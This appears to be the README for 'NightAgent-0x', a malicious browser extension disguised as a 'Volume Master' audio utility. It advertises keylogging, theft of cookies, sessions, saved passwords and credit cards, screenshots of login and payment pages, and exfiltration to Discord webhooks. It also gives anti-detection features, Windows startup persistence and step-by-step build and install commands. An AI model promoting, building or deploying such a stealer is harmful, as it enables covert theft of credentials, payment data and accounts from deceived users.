Stealth session capture extension disguised as a volume control utility with Discord C2 integration.
Volume Master appears as a legitimate audio enhancement browser extension while operating as an advanced data exfiltration toolkit. Features GUI-based builder for easy configuration and executable generation for persistent deployment.
- Multi-Target Capture: Automatically captures from 17+ platforms:
- WhatsApp Web, Google, Microsoft, Facebook, Twitter, Instagram
- LinkedIn, GitHub, Amazon, PayPal, Netflix, Yahoo, Reddit, Discord
- Cookie Harvesting: All domain variations (.domain, www.domain)
- Session Tokens: Complete localStorage & sessionStorage capture
- Auto-Login HTML: One-click session injection files
- Cookie-Editor Format: Export-ready JSON for browser extensions
- Advanced Keylogger: Captures email/username and password fields
- Autofill Detection: Extracts saved passwords from browser password manager
- Duplicate Prevention: Hash-based tracking prevents repeated captures
- Credit Card Harvester: Captures card numbers, CVV, expiry dates, cardholder names
- Payment Form Detection: Automatic detection of checkout/payment pages
- Full Keylogging: Captures ALL text inputs (search queries, messages, notes, comments)
- Storage Harvester: Real-time localStorage/sessionStorage monitoring
- Screenshot Capture: Automatic screenshots of sensitive pages (login, payment, bank)
- Navigation Tracking: Instant capture on page refresh/URL change
- Zero Console Logs: DEBUG_MODE controlled logging (disabled in production)
- Anti-Detection: Hides extension markers from page scripts
- Disguised UI: Appears as "Volume Master" audio control extension
- Payload Encryption: XOR encryption for sensitive webhook data
- Multi-Webhook: Up to 3 Discord webhooks for redundancy
- GUI Builder: Easy-to-use interface for configuration and deployment
- Executable Generation: Creates standalone .exe for Windows startup
- Discord Webhook Integration: No bot required, simple HTTP notifications
- Multi-Browser: Chrome, Firefox, Edge compatible
- Serverless Option: Direct webhook delivery (no backend required)
- Discord Server → Channel Settings → Integrations → Webhooks → Create Webhook
- Copy the webhook URL
git clone https://github.com/0nsec/NightAgent-0x.git
cd NightAgent-0x
# Install dependencies
npm install
pip install -r requirements.txt
# Launch GUI Builder
python builder-gui.py- Paste webhook URL
- Click "Save Config"
- Click "Run Server"
- Chrome: Load unpacked → Select
extension/folder - Extension appears as "Volume Master" audio control
Done! Extension captures sessions, server sends links to Discord.
-
Configuration
- Discord webhook URL (no bot required!)
- Server port (default: 3000)
- Auto-generates .env with encryption keys
- Built-in webhook help
-
Actions
- Run Server: Start the single unified server
- Build Executable: Create VolumeService.exe for startup
- Build Extension: Package extension as ZIP
- Install Dependencies: One-click npm install
-
Console Output
- Real-time server logs
- Build progress monitoring
- Error reporting
- Go to your Discord server
- Right-click the channel → Edit Channel
- Integrations → Webhooks → Create Webhook
- Copy the webhook URL
- Paste in the builder
After building the executable:
- Press
Win + R - Type:
shell:startup - Copy
dist/VolumeService.exeto startup folder - Service runs automatically on system boot
Chrome/Edge:
- Open
chrome://extensions/ - Enable "Developer mode"
- Click "Load unpacked" → Select
extension/folder - Extension appears as "Volume Master"
- Pin to toolbar for legitimacy
Firefox:
- Open
about:debugging#/runtime/this-firefox - Click "Load Temporary Add-on"
- Select
extension/manifest.json
After loading, the extension will:
- Send a startup alert to Discord with:
- Browser name & version
- Operating system
- Public IP address
- Timezone
- Enabled features
- Appear in extensions list as "Volume Master" with audio icon
- Show popup UI for volume control (cover functionality)
Test Credential Capture:
# Visit any login page
https://accounts.google.com/signin
# Either:
1. Let browser autofill saved password → Auto-captured in 3 seconds
2. Type username + password → Click submit → Captured on submitTest Credit Card Capture:
# Visit payment page
https://www.amazon.com/checkout/payment
# Enter card details → Blur field or submit → CapturedTest Storage Capture:
# Visit any site with active session
https://github.com
# Check Discord in ~2 seconds for localStorage/sessionStorage dumpTest Full Keylogging:
# Visit any site with text input
https://www.google.com
# Type 15+ characters in search bar → Press Enter or Tab → CapturedTest Screenshot:
# Visit sensitive page
https://login.microsoftonline.com
# Wait 2 seconds after page load → Screenshot sent to Discord# Clone repository
git clone https://github.com/0nsec/NightAgent-0x.git
cd NightAgent-0x
# Install dependencies
pip install -r requirements.txt
#run
python builder-cli.py┌─────────────────────────────────────────────────────────────────┐
│ BROWSER EXTENSION │
│ (Disguised as "Volume Master" Audio Control) │
└───────────┬─────────────────────────────────────────────────────┘
│
├──► [Keylogger] → Login Credentials
├──► [Credit Card Harvester] → Payment Data
├──► [Full Keylogger] → All Text Inputs
├──► [Storage Harvester] → localStorage/sessionStorage
├──► [Cookie Manager] → Session Cookies
├──► [Screenshot Capture] → Page Images
│
▼
┌───────────────────┐
│ Discord Webhooks │ ◄─── (No backend needed)
│ (Up to 3 URLs) │
└─────────┬─────────┘
│
▼
┌──────────────────────────────────────────────┐
│ Discord Channel │
│ • Login Credentials (RED) │
│ • Payment Data (Credit Cards) (GREEN) │
│ • Storage Tokens (localStorage) (PURPLE) │
│ • Text Inputs (Search, Messages) (BLUE) │
│ • Screenshots (Login/Payment Pages) (RED) │
│ • Navigation Alerts │
│ • HTML Session Files (Auto-Login) │
│ • Cookie-Editor JSON │
└──────────────────────────────────────────────┘
Automatic Capture:
- Page navigation/refresh on target domains (17+ sites)
- Form submission with credentials
- Browser autofill detection (saved passwords)
- Payment form fields filled
- Text input blur/Enter key (15+ characters)
- localStorage/sessionStorage changes
- Page load on sensitive URLs (login, payment, bank)
Periodic Capture:
- WhatsApp Web: Every 30 seconds
- General domains: Every 5-10 minutes (random)
- Storage data: Every 30 seconds
- Autofill check: Every 3 seconds
- Core: JavaScript (ES6+) with Chrome/Firefox WebExtensions API
- UI: Disguised as audio control interface
- Content Scripts:
keylogger.js- Credential capture (login forms)full-keylogger.js- All text input capturestorage-harvester.js- localStorage/sessionStorage monitoringwhatsapp.js- WhatsApp-specific capturegoogle.js- Google-specific captureaudio-controller.js- Legitimate audio control (cover)
- Node.js + Express
- Single unified server (api-server.js)
- Discord Webhooks (no bot required)
- Session manager for HTML file generation
- Encryption: XOR encryption for webhook payloads
- Anti-Detection: Dataset marker hiding, zero console logs
- Autofill Detection: CSS-based webkit animation monitoring
- Duplicate Prevention: Hash-based tracking
- One-Time Sessions: Links expire after use or 1 hour
- Encrypted Storage: Secure local credential storage
# Development mode
npm run dev
# Start Discord bot only
npm run bot
# Start session server only
npm run server
# Run tests
npm test
# Lint code
npm run lint
# Build for production
npm run build
